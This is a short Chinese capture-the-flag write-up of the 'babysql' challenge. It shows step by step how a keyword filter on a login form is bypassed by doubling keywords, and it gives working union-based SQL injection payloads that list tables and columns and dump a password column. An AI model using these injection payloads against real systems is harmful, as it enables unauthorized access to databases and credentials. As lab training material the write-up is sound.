babysql

news2025/3/12 9:03:45

打开界面是一个登录框，所以直接使用的万能公式，但是没用出发了报错

结合提示来看，题目应该是过滤掉了or

尝试大小写绕过，失败了

尝试双写绕过，成功绕过限制

接下来就判断字段数，发现by也被过滤掉了

登是登上去了，但是没啥用测不出来，还是直接用联合查询看看

不出意外union select都被过滤掉了，还是尝试双写绕过

1' ununionion seselectlect 1,2#

虽然没能成功，但是根据报错提示得出字段数不对

1' ununionion seselectlect 1,2,3#

成功试出来，包含三个字段

information from还有 where给过滤了，再次尝试双写绕过

发现information只是过滤掉了or

绕过成功

-1' ununionion seselectlect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

查看b4bsql表里的所有字段，并没有发现任何flag表，查看geekuser也是一样，那现在就一个个看吧，通常可能会在password里

-1' ununionion seselectlect 1,database(),group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

发现password被过滤，基本没跑了，尝试双写绕过

真的蠢，原来是因为password里包含or 所以被过滤掉了

获取到flag，完成

-1' ununionion seselectlect 1,database(),group_concat(passwoorrd) frfromom geek.b4bsql#

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/493087.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！